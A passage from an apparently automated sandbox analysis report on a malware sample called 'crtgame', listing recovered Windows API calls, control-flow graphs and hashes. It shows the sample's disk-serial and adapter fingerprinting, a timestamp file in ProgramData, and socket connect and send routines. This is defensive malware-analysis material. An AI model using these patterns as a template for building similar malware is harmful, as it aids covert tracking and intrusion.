                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C21E14
                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02C21E1B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                            • API String ID: 831262434-3017686385
                                                                                                            • Opcode ID: e993a84b8694c77433d99b98262513520827647c28ddbe8fe2c5dce7a90d7308
                                                                                                            • Instruction ID: 98c9c76c22ef06150845cd045fb1fccd50fce18b457910906afe1de4d3f9a741
                                                                                                            • Opcode Fuzzy Hash: e993a84b8694c77433d99b98262513520827647c28ddbe8fe2c5dce7a90d7308
                                                                                                            • Instruction Fuzzy Hash: D5319C769003109FD711EF24C848B2BBBE5EB84720F144A2DF8498B291DB719D49CFD2

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 02C25C5E
                                                                                                              • Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
                                                                                                              • Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
                                                                                                              • Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F
                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C25C7E
                                                                                                            • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C25C86
                                                                                                            • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C25C92
                                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C25CAB
                                                                                                            • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25CC0
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C25CC7
                                                                                                            • __time64.LIBCMT ref: 02C25CDB
                                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C25CF8
                                                                                                            • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C25D0D
                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C25D14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloclstrcatlstrcpy
                                                                                                            • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                                                            • API String ID: 49968893-2903805982
                                                                                                            • Opcode ID: 95ebd7cc75ee97f365b5ffebaf8388d85d8a8104bc32b7fe04c8f0032f4b6e15
                                                                                                            • Instruction ID: c366fa4306f6e951fde5d4a04866cadc69e4fc9e9c976c7a1f0ead33d92ad3a6
                                                                                                            • Opcode Fuzzy Hash: 95ebd7cc75ee97f365b5ffebaf8388d85d8a8104bc32b7fe04c8f0032f4b6e15
                                                                                                            • Instruction Fuzzy Hash: 2E2128769402187FE7106B649C88FAFFBACDB45664F104655F919A31C0DB705D4D8BF0

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C24CB6
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24CE2
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24CEE
                                                                                                              • Part of subcall function 02C24B18: __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                                              • Part of subcall function 02C24B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DBE
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DC4
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24DCB
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24DD1
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FD2
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FD8
                                                                                                            • RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C24FE3
                                                                                                            • RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C24FEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                            • String ID:
                                                                                                            • API String ID: 2062355503-0
                                                                                                            • Opcode ID: 5db4d041cf589095f51140a4eb1e51051999f742f3f2290d437e27b524a0a86e
                                                                                                            • Instruction ID: 01c857fccceef6aecffe26ae11e284201181ee8c32bf912d721342ee7c620c53
                                                                                                            • Opcode Fuzzy Hash: 5db4d041cf589095f51140a4eb1e51051999f742f3f2290d437e27b524a0a86e
                                                                                                            • Instruction Fuzzy Hash: A9B14975D0026DDFDF25DFA0C840BEEBBB5AF44314F10419AE80976280DBB56A89CFA5

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45583), ref: 02C22738
                                                                                                              • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                            • String ID: timer
                                                                                                            • API String ID: 4293676635-1792073242
                                                                                                            • Opcode ID: d73cdbb6ae68f5086144ed8d2357082a310a45fe4ab194e433aa706d3499498e
                                                                                                            • Instruction ID: 52de92e8f5962d8bd1eaf0035d3dbfe732c2b6a9422d41c79c6f8f2787ee27fd
                                                                                                            • Opcode Fuzzy Hash: d73cdbb6ae68f5086144ed8d2357082a310a45fe4ab194e433aa706d3499498e
                                                                                                            • Instruction Fuzzy Hash: 59317EB2909755AFD710DF65D944B17BBE8FB48B24F004A2EF85583680DB70E918CF92

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 02C2F2AF: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C2F2CE
                                                                                                              • Part of subcall function 02C2F2AF: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C2F30C
                                                                                                              • Part of subcall function 02C2F2AF: GetLastError.KERNEL32 ref: 02C2F36D
                                                                                                              • Part of subcall function 02C2F2AF: CloseHandle.KERNELBASE(?), ref: 02C2F3A4
                                                                                                              • Part of subcall function 02C2F3B3: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3C9
                                                                                                              • Part of subcall function 02C2F3B3: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3E2
                                                                                                              • Part of subcall function 02C2F3B3: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F407
                                                                                                              • Part of subcall function 02C2F3B3: FreeLibrary.KERNEL32(00000000), ref: 02C2F490
                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F248
                                                                                                            • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F269
                                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F27D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C2F286
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                                                            • String ID: tLVh
                                                                                                            • API String ID: 1378705229-319918027
                                                                                                            • Opcode ID: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                                                            • Instruction ID: a0048b1598334a9afe3df39fd65ffeff9b513fa48c48eea6b341237b030d8731
                                                                                                            • Opcode Fuzzy Hash: a3bfa404f34c5709ae8378ee101603c7aa1f919e2c9ac0080dcec186dc6f4651
                                                                                                            • Instruction Fuzzy Hash: DE116375D0132C6BDB20DBA5DD48FDEBBBEAB45710F000619E909AB184DB745A4DCBD0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 945 2c229ee-2c22a06 946 2c22ab3-2c22abb call 2c30530 945->946 947 2c22a0c-2c22a10 945->947 956 2c22abe-2c22ac6 946->956 948 2c22a12-2c22a15 947->948 949 2c22a39-2c22a4c WSASetLastError closesocket call 2c29ea8 947->949 948->949 951 2c22a17-2c22a36 call 2c30530 call 2c22f50 948->951 955 2c22a51-2c22a55 949->955 951->949 955->946 958 2c22a57-2c22a5f call 2c30530 955->958 963 2c22a61-2c22a67 958->963 964 2c22a69-2c22a71 call 2c30530 958->964 963->964 965 2c22a7b-2c22aad ioctlsocket WSASetLastError closesocket call 2c29ea8 963->965 969 2c22a73-2c22a79 964->969 970 2c22aaf-2c22ab1 964->970 965->970 969->965 969->970 970->946 970->956
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C22A3B
                                                                                                            • closesocket.WS2_32(?), ref: 02C22A42
                                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C22A89
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02C22A97
                                                                                                            • closesocket.WS2_32(?), ref: 02C22A9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1561005644-0
                                                                                                            • Opcode ID: 6dc3e3a8dbaa23ed405250ccec6ac9d18dcabe8918b6b69c3018de6f26fa618d
                                                                                                            • Instruction ID: 7e3897fd8f0787480d790a200ed26505447f4da39a80d78dc49308621cd1f792
                                                                                                            • Opcode Fuzzy Hash: 6dc3e3a8dbaa23ed405250ccec6ac9d18dcabe8918b6b69c3018de6f26fa618d
                                                                                                            • Instruction Fuzzy Hash: 93212B77940315EBDB34ABB8880476EB7E9DF84315F10496DEC45C3540EF708A48C791

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 972 2c21ba7-2c21bcf call 2c44e20 RtlEnterCriticalSection 975 2c21bd1 972->975 976 2c21be9-2c21bf7 RtlLeaveCriticalSection call 2c2dccf 972->976 977 2c21bd4-2c21be0 call 2c21b79 975->977 978 2c21bfa-2c21c20 RtlEnterCriticalSection 976->978 984 2c21be2-2c21be7 977->984 985 2c21c55-2c21c6e RtlLeaveCriticalSection 977->985 980 2c21c34-2c21c36 978->980 982 2c21c22-2c21c2f call 2c21b79 980->982 983 2c21c38-2c21c43 980->983 987 2c21c45-2c21c4b 982->987 990 2c21c31 982->990 983->987 984->976 984->977 987->985 989 2c21c4d-2c21c51 987->989 989->985 990->980
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 1633115879-0
                                                                                                            • Opcode ID: 42d1805a73938c1245f7beb0254dae7e717cfff16c335560098031be4891f612
                                                                                                            • Instruction ID: 7081bddc45159c550bd6ecf217308998edd6e86cdd5f8357a3cc14283b77b125
                                                                                                            • Opcode Fuzzy Hash: 42d1805a73938c1245f7beb0254dae7e717cfff16c335560098031be4891f612
                                                                                                            • Instruction Fuzzy Hash: 41218DB9A00614AFCB14CF68C44479ABBB5FF88714F158549EC1997302DBB4EA09CBE0

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C2358B,?,?,?,?,?,?,?,02C28FBF,?), ref: 02C22EEE
                                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22EFD
                                                                                                            • WSAGetLastError.WS2_32(?,02C2358B,?,?,?,?,?,?,?,02C28FBF,?,?,?,00000001,00000006,?), ref: 02C22F0C
                                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C22F36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2093263913-0
                                                                                                            • Opcode ID: a90fe87ebc76f38aec3b0ac9cb1989ee31f92df39ee3fe15ec69920e7abd7db1
                                                                                                            • Instruction ID: b7804b17fd9e88932ec7b6e80114420bc1f6e50faf41552d2daae1338b983cf2
                                                                                                            • Opcode Fuzzy Hash: a90fe87ebc76f38aec3b0ac9cb1989ee31f92df39ee3fe15ec69920e7abd7db1
                                                                                                            • Instruction Fuzzy Hash: 67017576940314BBDB309F65DC88B5BBBA9EB85771F008AA9FD088B141D7718904CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1001 2c22db5-2c22dc8 1002 2c22de4-2c22de8 1001->1002 1003 2c22dca-2c22dd2 call 2c30530 1001->1003 1005 2c22dea-2c22ded 1002->1005 1006 2c22dfc-2c22e07 call 2c22d39 1002->1006 1011 2c22dd8 1003->1011 1005->1006 1009 2c22def-2c22dfa call 2c30530 1005->1009 1010 2c22e0c-2c22e11 1006->1010 1009->1011 1013 2c22e13 1010->1013 1014 2c22ddd-2c22de3 1010->1014 1015 2c22ddb 1011->1015 1017 2c22e16-2c22e18 1013->1017 1015->1014 1017->1015 1018 2c22e1a-2c22e35 call 2c30530 call 2c2166f 1017->1018 1023 2c22e37-2c22e52 call 2c30530 call 2c2166f 1018->1023 1024 2c22e54-2c22e97 WSASetLastError select call 2c29ea8 1018->1024 1023->1015 1023->1024 1029 2c22ea6 1024->1029 1030 2c22e99-2c22ea4 call 2c30530 1024->1030 1033 2c22eb6-2c22eb8 1029->1033 1034 2c22ea8-2c22eb3 call 2c30530 1029->1034 1038 2c22ebe-2c22ed2 call 2c22d39 1030->1038 1033->1015 1033->1038 1034->1033 1038->1017 1042 2c22ed8 1038->1042 1042->1014
                                                                                                            APIs
                                                                                                              • Part of subcall function 02C22D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                                                              • Part of subcall function 02C22D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C22E6D
                                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C22E83
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Sendselect
                                                                                                            • String ID: 3'
                                                                                                            • API String ID: 2958345159-280543908
                                                                                                            • Opcode ID: a449d1257649d26b60d8175daebbeec29759f9301a20e27ae5da09572f07a8cf
                                                                                                            • Instruction ID: d84388d0ea7f298e6e23a13eafa4b90f882c166cab461a9a1a8fc58fadf35139
                                                                                                            • Opcode Fuzzy Hash: a449d1257649d26b60d8175daebbeec29759f9301a20e27ae5da09572f07a8cf
                                                                                                            • Instruction Fuzzy Hash: 7231E3B6E102299FDF11DF60C8147EEBBEAEF45314F00499AEC4493240EB749959DFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1043 2c22ac7-2c22ad6 1044 2c22ae8-2c22b02 WSASetLastError connect call 2c29ea8 1043->1044 1045 2c22ad8-2c22ae6 call 2c30530 1043->1045 1049 2c22b07-2c22b09 1044->1049 1050 2c22b13 1045->1050 1051 2c22b16-2c22b31 call 2c30530 call 2c2166f 1049->1051 1052 2c22b0b-2c22b10 call 2c30530 1049->1052 1050->1051 1059 2c22b33-2c22b4e call 2c30530 call 2c2166f 1051->1059 1060 2c22b50-2c22b5b call 2c23027 1051->1060 1052->1050 1059->1060 1066 2c22b8f-2c22b94 1059->1066 1060->1066 1067 2c22b5d-2c22b80 call 2c22fb4 1060->1067 1067->1066 1071 2c22b82-2c22b8c call 2c30530 1067->1071 1071->1066
                                                                                                            APIs
                                                                                                            • WSASetLastError.WS2_32(00000000,?,?), ref: 02C22AEA
                                                                                                            • connect.WS2_32(00000010,?,?), ref: 02C22AF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastconnect
                                                                                                            • String ID: 3'
                                                                                                            • API String ID: 374722065-280543908
                                                                                                            • Opcode ID: 2b5181f36c0bdd020190f23ebcb35f4d49dc4566a886144627d5398c4d01f54b
                                                                                                            • Instruction ID: f47491f00874c602a80da04a8460ea5bf64d873142d6ea4771850b2b8e963556
                                                                                                            • Opcode Fuzzy Hash: 2b5181f36c0bdd020190f23ebcb35f4d49dc4566a886144627d5398c4d01f54b
                                                                                                            • Instruction Fuzzy Hash: 5121D772E00218ABCF14EFB4D4147AEBBBAEF84324F00459DDC5993280EF744A099F92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1074 2c2353e-2c23555 call 2c44e20 1077 2c23576-2c2359c call 2c22edd 1074->1077 1078 2c23557-2c23571 call 2c21996 1074->1078 1084 2c2359e-2c235a8 1077->1084 1085 2c235ad-2c235c3 CreateIoCompletionPort 1077->1085 1083 2c23688-2c23697 1078->1083 1086 2c23684 1084->1086 1087 2c235c5-2c235d9 GetLastError call 2c30530 1085->1087 1088 2c235db-2c235e2 call 2c30530 1085->1088 1091 2c23687 1086->1091 1094 2c235e4-2c235ed 1087->1094 1088->1094 1091->1083 1095 2c23626-2c23630 1094->1095 1096 2c235ef-2c23624 call 2c30530 call 2c229ee 1094->1096 1098 2c23632-2c23633 1095->1098 1099 2c23640 1095->1099 1096->1091 1102 2c23635-2c23638 1098->1102 1103 2c2363a-2c2363e 1098->1103 1100 2c23644-2c2366a call 2c2d892 1099->1100 1108 2c23671-2c23681 call 2c30530 1100->1108 1109 2c2366c call 2c2143f 1100->1109 1102->1100 1103->1100 1108->1086 1109->1108
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: d7d23b330887a194c86a1c742578f2acc4972958eec91788b68ff3a15dd2da81
                                                                                                            • Instruction ID: ac03c29482bbf24310a911340fca8e972542424cf36142a1f7eac82a88dc3cc9
                                                                                                            • Opcode Fuzzy Hash: d7d23b330887a194c86a1c742578f2acc4972958eec91788b68ff3a15dd2da81
                                                                                                            • Instruction Fuzzy Hash: D2515BB190425ADFCB09DF68D4407AABBB5FF08320F10819EE8699B380DB749A14CF91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1113 2c2369a-2c236b1 InterlockedIncrement 1114 2c236b3-2c236b7 1113->1114 1115 2c236b9-2c236c1 1113->1115 1116 2c23722-2c2372d call 2c2247d 1114->1116 1117 2c236c3-2c236ca 1115->1117 1118 2c236cc-2c236fc WSARecv WSAGetLastError 1115->1118 1126 2c2373a-2c2373c 1116->1126 1117->1116 1119 2c23705-2c2370f 1118->1119 1120 2c236fe-2c23703 1118->1120 1122 2c23712-2c23715 1119->1122 1120->1122 1124 2c23717-2c2371c 1122->1124 1125 2c2372f-2c23735 call 2c22420 1122->1125 1124->1125 1127 2c2371e-2c23721 1124->1127 1125->1126 1127->1116
                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02C236A7
                                                                                                              • Part of subcall function 02C22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                                                              • Part of subcall function 02C22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                                                              • Part of subcall function 02C22420: RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                                                              • Part of subcall function 02C22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                                                              • Part of subcall function 02C22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1601054111-0
                                                                                                            • Opcode ID: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                                                            • Instruction ID: c48001732b2c2cef5eb9e3ddcf44335f6511c94da44188212dab1e071f4f9945
                                                                                                            • Opcode Fuzzy Hash: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                                                            • Instruction Fuzzy Hash: 7011C1B5100258ABDF218E14CC85FAA3BAAFF50750F104556FE528B2D0CF38E968CB94
                                                                                                            APIs
                                                                                                            • __beginthreadex.LIBCMT ref: 02C31B26
                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C2A5F0,00000000), ref: 02C31B57
                                                                                                            • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C2A5F0,00000000), ref: 02C31B65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                            • String ID:
                                                                                                            • API String ID: 1685284544-0
                                                                                                            • Opcode ID: d7a3008dafa6b8e1a856657d97963ea05b64986d3789d5dae03f87c1388b4970
                                                                                                            • Instruction ID: 11c605c890d0cdffb36726399637cf0f8621e93036873f647d77cb70ecb56354
                                                                                                            • Opcode Fuzzy Hash: d7a3008dafa6b8e1a856657d97963ea05b64986d3789d5dae03f87c1388b4970
                                                                                                            • Instruction Fuzzy Hash: 0EF0C8702402005FD7209F5CDC80FD173D8AF89728F180A6AF548C7280D3A1E8969A90
                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(02C574A0), ref: 02C21ABA
                                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02C21ACB
                                                                                                            • InterlockedExchange.KERNEL32(02C574A4,00000000), ref: 02C21AD7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                            • String ID:
                                                                                                            • API String ID: 1856147945-0
                                                                                                            • Opcode ID: d45f1b691eab43e625ef79d5d8cd1a0abbe893a4dbeb019ca2eef7b6e653087e
                                                                                                            • Instruction ID: a1b102a441f0f125537ec75e2f2985fc14d15d9b82164a2f039079e3e34538ab
                                                                                                            • Opcode Fuzzy Hash: d45f1b691eab43e625ef79d5d8cd1a0abbe893a4dbeb019ca2eef7b6e653087e
                                                                                                            • Instruction Fuzzy Hash: E2D02B38D801145BF21066A49C0EB3AF79CD700624F000750FC29C00C0EB50656C85E7
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                                              • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                                              • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                                              • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                                              • Part of subcall function 02C2DA97: __EH_prolog.LIBCMT ref: 02C2DA9C
                                                                                                              • Part of subcall function 02C2DA97: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB1B
                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 1927618982-0
                                                                                                            • Opcode ID: deb79ec463c27fabd3ff090995f525688e5d211fef671b95d72c82c7a0c4b342
                                                                                                            • Instruction ID: 6f88158442ab92f5f8e99073a3f94c9b162be294be90da7c45d8804a03b76d3c
